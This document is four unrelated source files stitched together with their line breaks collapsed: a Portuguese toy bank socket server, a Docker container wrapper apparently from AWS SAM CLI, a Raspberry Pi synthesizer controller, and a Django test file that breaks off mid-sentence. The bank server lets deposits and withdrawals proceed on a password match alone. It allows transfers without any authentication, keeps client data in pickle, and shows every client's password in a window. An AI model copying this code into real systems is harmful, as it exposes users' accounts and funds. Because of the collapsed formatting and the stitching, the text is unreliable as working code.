from socket import * import threading from classes import * from datetime import * from time import * from pickle import * from threading import * from cripto import * from ast import literal_eval from tkinter import * # CRIANDO O SERVIDOR server = socket(AF_INET, SOCK_STREAM) host = gethostname() porta = 20000 server.bind((host,porta)) server.listen() # DESERIALIZANDO OS CLIENTES with open('clientes.pickle', 'rb') as f: clientes = load(f) # FUNÇÃO PRINCIPAL def realiza_trabalho(client, addr): while 1: try: verifica = client.recv(1024).decode('utf-8') except: client.close() print('O cliente se desconectou!') break # ENTRADA if verifica == '1': a = 1 ver_conta = str(client.recv(1024).decode('utf-8')) ver_senha = str(client.recv(1024).decode('utf-8')) for x in clientes: if x.getConta() == ver_conta and x.getSenha() == ver_senha: client.send('ok'.encode('utf-8')) sleep(0.001) client.send(x.getNome().encode('utf-8')) sleep(0.001) client.send(str(x.getSaldo()).encode('utf-8')) sleep(0.001) client.send(x.getEmail().encode('utf-8')) sleep(0.001) client.send(x.getCpf().encode('utf-8')) print('Requisição do cliente concluida.\n\n-------------------------------------------') break elif a == tamanho: print(f'Ops! Cliente {ver_conta} não encontrado.\n\n-------------------------------------------') client.send('n'.encode('utf-8')) a += 1 # CADASTRO elif verifica == '2': b = 0 recv_cpf = client.recv(1024).decode('utf-8') for y in clientes: if y.getCpf() == recv_cpf: client.send('n'.encode('utf-8')) print('O cliente tentou cadastrar um CPF já cadastrado.\n\n-------------------------------------------') break else: client.send('ok'.encode('utf-8')) recv_nome = client.recv(1024).decode('utf-8') recv_email = client.recv(1024).decode('utf-8') recv_senha = client.recv(1024).decode('utf-8') clientes.append(cliente(recv_nome, recv_cpf, recv_email, recv_senha)) with open('clientes.pickle', 'wb') as f: dump(clientes, f) client.send(clientes[b-1].getConta().encode('utf-8')) print(f'Oba! O cliente {clientes[b-1].getConta()} foi cadastrado\n\n-------------------------------------------') b += 1 # DEPÓSITO elif verifica == '3': ver_senha = client.recv(1024).decode('utf-8') for c in clientes: if c.getSenha() == ver_senha: valor_deposito = float(client.recv(1024).decode('utf-8')) c.setSaldo(c.getSaldo() + valor_deposito) with open('clientes.pickle', 'wb') as f: dump(clientes, f) print('Oba! Saldo de ' + c.getNome() + ' Atualizado para ' + str(c.getSaldo()) + '\n\n-------------------------------------------') break # SAQUE elif verifica == '4': ver_senha = client.recv(1024).decode('utf-8') for n in clientes: if n.getSenha() == ver_senha: valor_saque = float(client.recv(1024).decode('utf-8')) n.setSaldo(n.getSaldo() - valor_saque) with open('clientes.pickle', 'wb') as f: dump(clientes, f) print('Oba! O Cliente Sacou R$ ' + str(valor_saque) + '\n\n-------------------------------------------') break # TRANSFERÊNCIA elif verifica == '5': dados = client.recv(1024).decode('utf-8') dados = literal_eval(descriptografar(dados)) for x in clientes: if x.getConta() == dados['conta']: x.setSaldo(x.getSaldo() + float(dados['valor'])) for y in clientes: if y.getConta() == dados['conta2']: y.setSaldo(y.getSaldo() - float(dados['valor'])) client.send('ok'.encode('utf-8')) break with open('clientes.pickle', 'wb') as f: dump(clientes, f) elif clientes.index(x) == (len(clientes) - 1): client.send('n'.encode('utf-8')) def mostrar(): def line(): return('\n' + ('---------------------------------------' * 2) + '\n') lista = Tk() lista.title('Clientes cadastrados') peoples = Text(lista) peoples.insert(END, '|{:<50s}|{:<10s}|{:<14s}|'.format('Nome', 'Conta', 'Senha') + line()) for x in clientes: peoples.insert(END, '|{:<50s}|{:<10s}|{:<14s}|'.format(x.getNome(), x.getConta(), x.getSenha()) + line()) peoples.pack(side = TOP) lista.mainloop() l = Thread(target = mostrar) l.start() # INICIANDO A CONEXÃO while 1: tamanho = len(clientes) print('\nClientes cadastrados: ' + str(tamanho)) print('Aguardando conexão do cliente...' ) client, addr = server.accept() data = datetime.now() print(f'Oba! Cliente {addr} conectado as {data.hour} : {data.minute}') print('-------------------------------------------') t = Thread(target = realiza_trabalho, args = (client, addr)) t.start()
container.py
""" Representation of a generic Docker container """ import logging import tarfile import tempfile import threading import docker import requests from docker.errors import NotFound as DockerNetworkNotFound from samcli.lib.utils.retry import retry from .exceptions import ContainerNotStartableException from .utils import to_posix_path, find_free_port, NoFreePortsError LOG = logging.getLogger(__name__) class ContainerResponseException(Exception): """ Exception raised when unable to communicate with RAPID APIs on a running container. """ class Container: """ Represents an instance of a Docker container with a specific configuration. The container is not actually created or executed until the appropriate methods are called. Each container instance is uniquely identified by an ID that the Docker Daemon creates when the container is started. NOTE: This class does not download container images. It should be pulled separately and made available before creating a container with this class """ # This frame type value is coming directly from Docker Attach Stream API spec _STDOUT_FRAME_TYPE = 1 _STDERR_FRAME_TYPE = 2 RAPID_PORT_CONTAINER = "8080" URL = "http://localhost:{port}/2015-03-31/functions/{function_name}/invocations" # NOTE(sriram-mv): 100ms Connection Timeout for http requests talking to `aws-lambda-rie` HTTP APIs RAPID_CONNECTION_TIMEOUT = 0.1 def __init__( self, image, cmd, working_dir, host_dir, memory_limit_mb=None, exposed_ports=None, entrypoint=None, env_vars=None, docker_client=None, container_opts=None, additional_volumes=None, ): """ Initializes the class with given configuration. This does not automatically create or run the container. :param string image: Name of the Docker image to create container with :param string working_dir: Working directory for the container :param string host_dir: Directory in the host operating system that should be mounted to the ``working_dir`` on container :param list cmd: Command to pass to container :param int memory_limit_mb: Optional. Max limit of memory in MegaBytes this Lambda function can use. :param dict exposed_ports: Optional. Dict of ports to expose :param list entrypoint: Optional. Entry point process for the container. Defaults to the value in Dockerfile :param dict env_vars: Optional. Dict of environment variables to setup in the container """ self._image = image self._cmd = cmd self._working_dir = working_dir self._host_dir = host_dir self._exposed_ports = exposed_ports self._entrypoint = entrypoint self._env_vars = env_vars self._memory_limit_mb = memory_limit_mb self._network_id = None self._container_opts = container_opts self._additional_volumes = additional_volumes self._logs_thread = None # Use the given Docker client or create new one self.docker_client = docker_client or docker.from_env() # Runtime properties of the container. They won't have value until container is created or started self.id = None # aws-lambda-rie defaults to 8080 as the port, however that's a common port. A port is chosen by # selecting the first free port in a range that's not ephemeral. self._start_port_range = 5000 self._end_port_range = 9000 try: self.rapid_port_host = find_free_port(start=self._start_port_range, end=self._end_port_range) except NoFreePortsError as ex: raise ContainerNotStartableException(str(ex)) from ex def create(self): """ Calls Docker API to creates the Docker container instance. Creating the container does *not* run the container. Use ``start`` method to run the container :return string: ID of the created container :raise RuntimeError: If this method is called after a container already has been created """ if self.is_created(): raise RuntimeError("This container already exists. Cannot create again.") _volumes = {} if self._host_dir: LOG.info("Mounting %s as %s:ro,delegated inside runtime container", self._host_dir, self._working_dir) _volumes = { self._host_dir: { # Mount the host directory as "read only" directory inside container at working_dir # https://docs.docker.com/storage/bind-mounts # Mount the host directory as "read only" inside container "bind": self._working_dir, "mode": "ro,delegated", } } kwargs = { "command": self._cmd, "working_dir": self._working_dir, "volumes": _volumes, # We are not running an interactive shell here. "tty": False, # Set proxy configuration from global Docker config file "use_config_proxy": True, } if self._container_opts: kwargs.update(self._container_opts) if self._additional_volumes: kwargs["volumes"].update(self._additional_volumes) # Make sure all mounts are of posix path style. kwargs["volumes"] = {to_posix_path(host_dir): mount for host_dir, mount in kwargs["volumes"].items()} if self._env_vars: kwargs["environment"] = self._env_vars kwargs["ports"] = {self.RAPID_PORT_CONTAINER: ("127.0.0.1", self.rapid_port_host)} if self._exposed_ports: kwargs["ports"].update( {container_port: ("127.0.0.1", host_port) for container_port, host_port in self._exposed_ports.items()} ) if self._entrypoint: kwargs["entrypoint"] = self._entrypoint if self._memory_limit_mb: # Ex: 128m => 128MB kwargs["mem_limit"] = "{}m".format(self._memory_limit_mb) if self.network_id == "host": kwargs["network_mode"] = self.network_id real_container = self.docker_client.containers.create(self._image, **kwargs) self.id = real_container.id self._logs_thread = None if self.network_id and self.network_id != "host": try: network = self.docker_client.networks.get(self.network_id) network.connect(self.id) except DockerNetworkNotFound: # stop and delete the created container before raising the exception real_container.remove(force=True) raise return self.id def delete(self): """ Removes a container that was created earlier. """ if not self.is_created(): LOG.debug("Container was not created. Skipping deletion") return try: self.docker_client.containers.get(self.id).remove(force=True) # Remove a container, even if it is running except docker.errors.NotFound: # Container is already not there LOG.debug("Container with ID %s does not exist. Skipping deletion", self.id) except docker.errors.APIError as ex: msg = str(ex) removal_in_progress = ("removal of container" in msg) and ("is already in progress" in msg) # When removal is already started, Docker API will throw an exception # Skip such exceptions. if not removal_in_progress: raise ex self.id = None def start(self, input_data=None): """ Calls Docker API to start the container. The container must be created at the first place to run. It waits for the container to complete, fetches both stdout and stderr logs and returns through the given streams. Parameters ---------- input_data Optional. Input data sent to the container through container's stdin. """ if input_data: raise ValueError("Passing input through container's stdin is not supported") if not self.is_created(): raise RuntimeError("Container does not exist. Cannot start this container") # Get the underlying container instance from Docker API real_container = self.docker_client.containers.get(self.id) # Start the container real_container.start() @retry(exc=requests.exceptions.RequestException, exc_raise=ContainerResponseException) def wait_for_http_response(self, name, event, stdout): # TODO(sriram-mv): `aws-lambda-rie` is in a mode where the function_name is always "function" # NOTE(sriram-mv): There is a connection timeout set on the http call to `aws-lambda-rie`, however there is not # a read time out for the response received from the server. resp = requests.post( self.URL.format(port=self.rapid_port_host, function_name="function"), data=event, timeout=(self.RAPID_CONNECTION_TIMEOUT, None), ) stdout.write(resp.content) def wait_for_result(self, name, event, stdout, stderr): # NOTE(sriram-mv): Let logging happen in its own thread, so that a http request can be sent. # NOTE(sriram-mv): All logging is re-directed to stderr, so that only the lambda function return # will be written to stdout. # the log thread will not be closed until the container itself got deleted, # so as long as the container is still there, no need to start a new log thread if not self._logs_thread or not self._logs_thread.is_alive(): self._logs_thread = threading.Thread(target=self.wait_for_logs, args=(stderr, stderr), daemon=True) self._logs_thread.start() self.wait_for_http_response(name, event, stdout) def wait_for_logs(self, stdout=None, stderr=None): # Return instantly if we don't have to fetch any logs if not stdout and not stderr: return if not self.is_created(): raise RuntimeError("Container does not exist. Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) # Fetch both stdout and stderr streams from Docker as a single iterator. logs_itr = real_container.attach(stream=True, logs=True, demux=True) self._write_container_output(logs_itr, stdout=stdout, stderr=stderr) def copy(self, from_container_path, to_host_path): if not self.is_created(): raise RuntimeError("Container does not exist. Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) LOG.debug("Copying from container: %s -> %s", from_container_path, to_host_path) with tempfile.NamedTemporaryFile() as fp: tar_stream, _ = real_container.get_archive(from_container_path) for data in tar_stream: fp.write(data) # Seek the handle back to start of file for tarfile to use fp.seek(0) with tarfile.open(fileobj=fp, mode="r") as tar: tar.extractall(path=to_host_path) @staticmethod def _write_container_output(output_itr, stdout=None, stderr=None): """ Based on the data returned from the Container output, via the iterator, write it to the appropriate streams Parameters ---------- output_itr: Iterator Iterator returned by the Docker Attach command stdout: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stdout data from Container into stderr: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stderr data from the Container into """ # Iterator returns a tuple of (stdout, stderr) for stdout_data, stderr_data in output_itr: if stdout_data and stdout: stdout.write(stdout_data) if stderr_data and stderr: stderr.write(stderr_data) @property def network_id(self): """ Gets the ID of the network this container connects to :return string: ID of the network """ return self._network_id @network_id.setter def network_id(self, value): """ Set the ID of network that this container should connect to :param string value: Value of the network ID """ self._network_id = value @property def image(self): """ Returns the image used by this container :return string: Name of the container image """ return self._image def is_created(self): """ Checks if the real container exists? Returns ------- bool True if the container is created """ if self.id: try: self.docker_client.containers.get(self.id) return True except docker.errors.NotFound: return False return False def is_running(self): """ Checks if the real container status is running Returns ------- bool True if the container is running """ try: real_container = self.docker_client.containers.get(self.id) return real_container.status == "running" except docker.errors.NotFound: return False
polytron.py
import time import sys import os import logging import threading import random import math import json from subprocess import Popen, PIPE, STDOUT from signal import signal, SIGINT sem = threading.Semaphore() import click import numpy as np from loguru import logger import mido from mido.ports import MultiPort import smbus import termplotlib as tpl logger.remove() logger.add(sys.stderr, level="INFO") # Get I2C bus bus = smbus.SMBus(1) VOLTAGE_VDD = 5.0 VOLTAGE_RAIL = 5.0 CHANNEL_PITCH = [32, 34, 36, 38] CHANNEL_CUTOFF = [33, 35, 37, 39] CHANNEL_NAMES = {} for _, v in enumerate(CHANNEL_CUTOFF): CHANNEL_NAMES[v] = "cutoff {}".format(v) for _, v in enumerate(CHANNEL_PITCH): CHANNEL_NAMES[v] = "pitch {}".format(v) def freq2voltage(freq,fitting): return fitting[0] * math.log(freq) + fitting[1] def midi2freq(midi_number): a = 440 # frequency of A (coomon value is 440Hz) return (a / 32) * (2 ** ((midi_number - 9) / 12)) def note2voltage(note,fitting): return freq2voltage(midi2freq(note),fitting) def midi2str(midi_number, sharp=True): """ Given a MIDI pitch number, returns its note string name (e.g. "C3"). """ MIDI_A4 = 69 num = midi_number - (MIDI_A4 - 4 * 12 - 9) note = (num + 0.5) % 12 - 0.5 rnote = int(round(note)) error = note - rnote octave = str(int(round((num - note) / 12.0))) if sharp: names = ["C", "C#", "D", "D#", "E", "F", "F#", "G", "G#", "A", "A#", "B"] else: names = ["C", "Db", "D", "Eb", "E", "F", "Gb", "G", "Ab", "A", "Bb", "B"] names = names[rnote] + octave if abs(error) < 1e-4: return names else: err_sig = "+" if error > 0 else "-" err_str = err_sig + str(round(100 * abs(error), 2)) + "%" return names + err_str def set_voltage(channel, voltage): sem.acquire() n = int(voltage / VOLTAGE_VDD * 65535) lo = n & 0x00FF hi = n >> 8 data = [hi, lo] sem.release() # 0x56 determined by sudo i2cdetect -y 1 bus.write_i2c_block_data(0x56, channel, data) logger.debug("{} set to {:2.2f}", channel, voltage) # # frequency analysis # def get_frequency_analysis(): cmd = "arecord -d 1 -f cd -t wav -D sysdefault:CARD=2 /tmp/1s.wav" p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True) output = p.stdout.read() if b"Recording WAVE" not in output: raise output # cmd = "sox /tmp/1s.wav -n stat -freq" cmd = "aubio pitch -m schmitt -H 1024 /tmp/1s.wav" p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True) output = p.stdout.read() with open("/tmp/1s.dat", "wb") as f: f.write(output) freq = analyze_aubio() return freq def analyze_aubio(): gathered_freqs = [] with open("/tmp/1s.dat", "r") as f: linenum = 0 for line in f: linenum += 1 if linenum < 10: continue s = line.split() if len(s) != 2: continue freq = float(s[1]) if freq > 50: gathered_freqs.append(freq) if len(gathered_freqs) == 0: return -1 avg = np.median(gathered_freqs) logger.debug("got frequency {}",avg) return avg # # plotting # def plot_points(voltage_to_frequency): x = [] y0 = [] for k in voltage_to_frequency: x.append(float(k)) y0.append(voltage_to_frequency[k]) fig = tpl.figure() print("\n") fig.plot( x, y0, plot_command="plot '-' w points", width=50, height=20, xlabel="voltage (v)", title="frequency (hz) vs voltage", ) fig.show() print("\n") class Envelope: """ Some monotrons may share an envelope. """ max_seconds = 10 max_voltage = VOLTAGE_RAIL min_voltage = 0.0 steps = 50 def __init__(self, voice): self.voice = voice self.last_played = time.time() self.is_attacking = False self.is_releasing = False self.a = 0.3 self.d = 0.1 self.s = 1.0 self.r = 0.5 self.peak = 1.0 self.value = 0 self.set_adsr(self.peak,self.a,self.d,self.s,self.r) def _increment_cutoff(self, val): self.value = self.value + val if self.value > self.max_voltage: self.value = self.max_voltage if self.value < self.min_voltage: self.value = self.min_voltage set_voltage(CHANNEL_CUTOFF[self.voice], self.value) def set_adsr(self, peak, a, d, s, r): # all input values are between 0 and 1 self.peak = peak * (self.max_voltage - self.min_voltage) + self.min_voltage self.a = a * self.max_seconds self.d = d * self.max_seconds self.s = s * (self.max_voltage - self.min_voltage) + self.min_voltage self.r = r * self.max_seconds def on(self): set_voltage(CHANNEL_CUTOFF[self.voice], VOLTAGE_RAIL) def off(self): set_voltage(CHANNEL_CUTOFF[self.voice], 0) def attack(self, voice, velocity): if self.is_attacking: return self.is_attacking = True self.is_releasing = False x = threading.Thread(target=self._attack, args=(voice, velocity,)) x.start() def _attack(self, voice, velocity): # attack logger.debug("attacking for {}s", self.a) step = (self.peak*velocity - self.value) / self.steps a = self.a - 0.2*(velocity)*self.max_seconds # shorten attack if played harder if a < 0: a = 0.1 for i in range(self.steps): if not self.is_attacking: return self._increment_cutoff(step) time.sleep(a / self.steps) set_voltage(CHANNEL_CUTOFF[self.voice], self.peak*velocity ) # decay logger.debug("decaying for {}s", self.d) s = self.s*velocity step = (s - self.value) / self.steps for i in range(self.steps): if not self.is_attacking: return self._increment_cutoff(step) time.sleep(self.d / self.steps) set_voltage(CHANNEL_CUTOFF[self.voice], s) self.is_attacking = False def release(self, voice): if self.is_releasing: return self.is_releasing = True self.is_attacking = False x = threading.Thread(target=self._release, args=(voice,)) x.start() def _release(self, voice): # release logger.debug("releasing for {}s", self.r) step = (self.min_voltage - self.value) / self.steps for i in range(self.steps): if not self.is_releasing: return self._increment_cutoff(step) time.sleep(self.r / self.steps) set_voltage(CHANNEL_CUTOFF[self.voice], self.min_voltage) self.is_releasing = False class Voices: """ Voices keeps track of the tuning and availability of each voice. There should be one voice object passed into each of the keyboards. Voices are indexed starting at 0. """ def __init__(self, max_voices, voice_envelope_mapping=[]): self.max_voices = max_voices self.voices = [0] * max_voices self.notes_used = {} self.voices_used = {} self.last_note = {} self.tuning = [{}] * max_voices self.envelope = [] self.portamento=[0]*max_voices self.mbs = [] # stores curve fitting for frequencies self.v2e = voice_envelope_mapping if len(self.v2e) != self.max_voices: self.v2e = list(range(self.max_voices)) for i in range(self.max_voices): self.envelope.append(Envelope(self.v2e[i])) def set_portamento(self,voice,portamento): self.portamento[voice]=portamento def set_adsr(self, voice, a, d, s, r): self.envelope[v2e[voice]].set_adsr(a, d, s, r) def tune_specific(self, specific_voice=-1): for voice in range(self.max_voices): if specific_voice > 0 and specific_voice != voice: continue self.off() note_to_voltage = {} voltage_to_frequency2 = {} previous_freq = 0 for midinote in range(60,70): target_freq = midi2freq(midinote) mid_voltage = note2voltage(midinote,self.mbs[voice]) logger.info("target: {:2.2f}",target_freq) logger.info("current voltage: {:2.3f}",mid_voltage) vs = [] fs = [] for voltage in np.arange(mid_voltage-0.006,mid_voltage+0.012,0.002): self.solo_voltage(voice,voltage) time.sleep(0.5) freq = get_frequency_analysis() print("{:2.3f} {:2.2f}".format(voltage,freq)) vs.append(voltage) fs.append(freq) mb = np.polyfit(fs, vs, 1) good_voltage = mb[0]*target_freq+mb[1] logger.info("new voltage: {}",good_voltage) voltage_to_frequency2[good_voltage] = target_freq note_to_voltage[midinote] = good_voltage with open("voltage_to_frequency2{}.json".format(voice), "w") as f: f.write(json.dumps(voltage_to_frequency2)) with open("note_to_voltage{}.json".format(voice), "w") as f: f.write(json.dumps(note_to_voltage)) self.off() self.load_tuning() def tune(self,specific_voice=-1): for voice in range(self.max_voices): if specific_voice > 0 and specific_voice != voice: continue self.off() voltage_to_frequency = {} previous_freq = 0 for voltage in range(210,300,5): voltage = float(voltage)/100.0 self.solo_voltage(voice,voltage) time.sleep(1) freq = get_frequency_analysis() if freq < previous_freq: continue voltage_to_frequency[voltage]=freq previous_freq = freq os.system("clear") print("voice {}".format(voice)) plot_points(voltage_to_frequency) logger.debug("voltage -> freq: {} -> {}",voltage,freq) with open("voltage_to_frequency{}.json".format(voice), "w") as f: f.write(json.dumps(voltage_to_frequency)) self.off() self.load_tuning() def load_tuning(self): self.mbs = [] self.note_to_voltage = [{}]*self.max_voices for voice in range(self.max_voices): try: self.note_to_voltage[voice] = json.load(open("note_to_voltage{}.json".format(voice), "rb")) except: pass voltage_to_frequency = json.load(open("voltage_to_frequency{}.json".format(voice), "rb")) x = [] y = [] y0 = [] for k in voltage_to_frequency: x.append(float(k)) y0.append(voltage_to_frequency[k]) y.append(math.log(voltage_to_frequency[k])) mb = np.polyfit(y, x, 1) fig = tpl.figure() print("\n") fig.plot( x, y0, plot_command="plot '-' w points", width=60, height=22, xlabel="voltage (v)", title="frequency (hz) vs voltage", label="volts = {:2.2f}*log(freq){:+2.2f} ".format(mb[0], mb[1]), ) fig.show() print("\n") time.sleep(0.1) if mb[0] < 0.5: mb[0] = 0.64 if mb[1] > 1: mb[1] = -1 self.mbs.append(mb) def solo_voltage(self,voice,voltage): for i in range(self.max_voices): self.envelope[self.v2e[i]].off() self.envelope[self.v2e[voice]].on() set_voltage(CHANNEL_PITCH[voice],voltage) def solo(self, voice): """ Turns up cutoff for voice Removes other voices """ for i in range(self.max_voices): if i == voice: set_voltage(CHANNEL_GATE[voice], GATE_ON) else: set_voltage(CHANNEL_GATE[voice], GATE_OFF) self.envelope[self.v2e[i]].off() self.envelope[self.v2e[voice]].on() def off(self): for i in range(self.max_voices): set_voltage(CHANNEL_CUTOFF[i],0) set_voltage(CHANNEL_PITCH[i],0) def acquire_voice(self): for voice in range(self.max_voices): if voice not in self.voices_used: return voice # find oldest voice oldest = 0 voice = 1 for i, v in enumerate(self.voices): if time.time() - v > oldest: oldest = time.time() - v voice = i return voice def play(self, note, velocity): if note in self.notes_used: return sem.acquire() voice = self.acquire_voice() self.voices[voice] = time.time() # remove voice if it was acquired if voice in self.voices_used: note_to_remove = self.voices_used[voice] logger.debug("removing voice {} playing {}", voice, note_to_remove) del self.voices_used[voice] del self.notes_used[note_to_remove] delete_note = [] self.notes_used[note] = voice self.voices_used[voice] = note sem.release() logger.info("playing {} ({:2.1f}) on voice {}", note, midi2freq(note), voice) # do legato if voice in self.last_note and self.portamento[voice] > 0: x = threading.Thread(target=self.play_legato, args=(voice,self.last_note[voice],note,)) x.start() else: # x = threading.Thread(target=self.play_detuned, args=(voice,note,)) # x.start() self._play(voice,note) self.envelope[self.v2e[voice]].attack(voice,velocity) self.last_note[voice]=note def _play(self,voice,note,voltage=0): if voltage == 0: voltage = note2voltage(note,self.mbs[voice]) if str(note) in self.note_to_voltage[voice]: logger.info("got voltage from note map") voltage = self.note_to_voltage[voice][str(note)] else: logger.info("not in map") print(self.note_to_voltage) set_voltage(CHANNEL_PITCH[voice], voltage) def play_detuned(self,voice,note): self._play(voice,note) freq = midi2freq(note) min_freq = freq*(1-0.02) max_freq = freq*(1+0.02) for i in range(100): if voice not in self.voices_used or self.voices_used[voice] != note: # note is canceled return self._play(voice,note,voltage=freq2voltage(random.random()*(max_freq-min_freq)+min_freq,self.mbs[voice])) time.sleep(0.05) def play_legato(self,voice,note1,note2): set_voltage(CHANNEL_PITCH[voice], note2voltage(note1,self.mbs[voice])) freq1 = midi2freq(note1) freq2 = midi2freq(note2) steps = int(self.portamento[voice]/0.025) for i in range(steps): if voice not in self.voices_used or self.voices_used[voice] != note2: # note is canceled return time.sleep(0.025) set_voltage(CHANNEL_PITCH[voice],freq2voltage( (freq2-freq1)*(i/steps)+freq1,self.mbs[voice] ) ) set_voltage(CHANNEL_PITCH[voice],freq2voltage(freq2,self.mbs[voice])) def stop(self, note): if note in self.notes_used: voice = self.notes_used[note] logger.debug("stopping {} on voice {}", note, voice) self.envelope[self.v2e[voice]].release(voice) sem.acquire() del self.voices_used[voice] del self.notes_used[note] sem.release() class Keyboard: def __init__(self, name, num_voices): self.num_voices = num_voices self.voices = Voices(self.num_voices) self.name = name name = name.split() if len(name) > 2: name = " ".join(name[:2]) else: name = " ".join(name) name = name.lower() name = name.replace(":", "") self.id = name def tune(self,specific_voice=-1): self.voices.tune(specific_voice) def tune_specific(self,specific_voice=-1): self.voices.load_tuning() self.voices.tune_specific(specific_voice) def load_tuning(self): self.voices.load_tuning() def listen(self): for name in mido.get_output_names(): t = threading.Thread(target=self._listen, args=(name,)) t.daemon = True t.start() def play(self,note,velocity): self.voices.play(note,velocity) def stop(self,note): self.voices.stop(note) def _listen(self,name): logger.info("listening to {}",name) with mido.open_input(name) as inport: for msg in inport: if msg.type == "note_on": note_name = midi2str(msg.note) logger.info( f"[{name}] {note_name} {msg.type} {msg.note} {msg.velocity}" ) self.voices.play(msg.note,127/127) elif msg.type == "note_off": note_name = midi2str(msg.note) logger.info( f"[{name}] {note_name} {msg.type} {msg.note} {msg.velocity}" ) self.voices.stop(msg.note) for i in range(32,40): set_voltage(i,0) keys = Keyboard("monotron",4) # keys.tune_specific() keys.load_tuning() keys.listen() time.sleep(60000) # keys.play(60) # keys.play(61) # keys.play(62) # time.sleep(3) # keys.stop(60) # keys.stop(61) # keys.stop(62) # time.sleep(3)
tests.py
from __future__ import unicode_literals import threading import warnings from datetime import datetime, timedelta from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections from django.db.models.fields import Field from django.db.models.fields.related import ForeignObjectRel from django.db.models.manager import BaseManager from django.db.models.query import EmptyQuerySet, QuerySet from django.test import ( SimpleTestCase, TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature, ) from django.utils import six from django.utils.translation import ugettext_lazy from .models import Article, ArticleSelectOnSave, SelfRef class ModelInstanceCreationTests(TestCase): def test_object_is_not_written_to_database_until_save_was_called(self): a = Article( id=None, headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) self.assertIsNone(a.id) self.assertEqual(Article.objects.all().count(), 0) # Save it into the database. You have to call save() explicitly. a.save() self.assertIsNotNone(a.id) self.assertEqual(Article.objects.all().count(), 1) def test_can_initialize_model_instance_using_positional_arguments(self): """ You can initialize a model instance using positional arguments, which should match the field order as defined in the model. """ a = Article(None, 'Second article', datetime(2005, 7, 29)) a.save() self.assertEqual(a.headline, 'Second article') self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0)) def test_can_create_instance_using_kwargs(self): a = Article( id=None, headline='Third article', pub_date=datetime(2005, 7, 30), ) a.save() self.assertEqual(a.headline, 'Third article') self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0)) def test_autofields_generate_different_values_for_each_instance(self): a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) self.assertNotEqual(a3.id, a1.id) self.assertNotEqual(a3.id, a2.id) def test_can_mix_and_match_position_and_kwargs(self): # You can also mix and match position and keyword arguments, but # be sure not to duplicate field information. a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Fourth article') def test_cannot_create_instance_with_invalid_kwargs(self): six.assertRaisesRegex( self, TypeError, "'foo' is an invalid keyword argument for this function", Article, id=None, headline='Some headline', pub_date=datetime(2005, 7, 31), foo='bar', ) def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self): """ You can leave off the value for an AutoField when creating an object, because it'll get filled in automatically when you save(). """ a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Article 5') self.assertNotEqual(a.id, None) def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self): a = Article(pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Default headline') def test_for_datetimefields_saves_as_much_precision_as_was_given(self): """as much precision in *seconds*""" a1 = Article( headline='Article 7', pub_date=datetime(2005, 7, 31, 12, 30), ) a1.save() self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date, datetime(2005, 7, 31, 12, 30)) a2 = Article( headline='Article 8', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a2.save() self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date, datetime(2005, 7, 31, 12, 30, 45)) def test_saving_an_object_again_does_not_create_a_new_object(self): a = Article(headline='original', pub_date=datetime(2014, 5, 16)) a.save() current_id = a.id a.save() self.assertEqual(a.id, current_id) a.headline = 'Updated headline' a.save() self.assertEqual(a.id, current_id) def test_querysets_checking_for_membership(self): headlines = [ 'Parrot programs in Python', 'Second article', 'Third article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() a = Article(headline='Some headline', pub_date=some_pub_date) a.save() # You can use 'in' to test for membership... self.assertIn(a, Article.objects.all()) # ... but there will often be more efficient ways if that is all you need: self.assertTrue(Article.objects.filter(id=a.id).exists()) class ModelTest(TestCase): def test_objects_attribute_is_only_available_on_the_class_itself(self): six.assertRaisesRegex( self, AttributeError, "Manager isn't accessible via Article instances", getattr, Article(), "objects", ) self.assertFalse(hasattr(Article(), 'objects')) self.assertTrue(hasattr(Article, 'objects')) def test_queryset_delete_removes_all_items_in_that_queryset(self): headlines = [ 'An article', 'Article One', 'Amazing article', 'Boring article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Amazing article>", "<Article: An article>", "<Article: Article One>", "<Article: Boring article>"]) Article.objects.filter(headline__startswith='A').delete() self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Boring article>"]) def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self): some_pub_date = datetime(2014, 5, 16, 12, 1) a1 = Article.objects.create(headline='First', pub_date=some_pub_date) a2 = Article.objects.create(headline='Second', pub_date=some_pub_date) self.assertNotEqual(a1, a2) self.assertEqual(a1, Article.objects.get(id__exact=a1.id)) self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id)) @skipUnlessDBFeature('supports_microsecond_precision') def test_microsecond_precision(self): # In PostgreSQL, microsecond-level precision is available. a9 = Article( headline='Article 9', pub_date=datetime(2005, 7, 31, 12, 30, 45, 180), ) a9.save() self.assertEqual(Article.objects.get(pk=a9.pk).pub_date, datetime(2005, 7, 31, 12, 30, 45, 180)) @skipIfDBFeature('supports_microsecond_precision') def test_microsecond_precision_not_supported(self): # In MySQL, microsecond-level precision isn't always available. You'll # lose microsecond-level precision once the data is 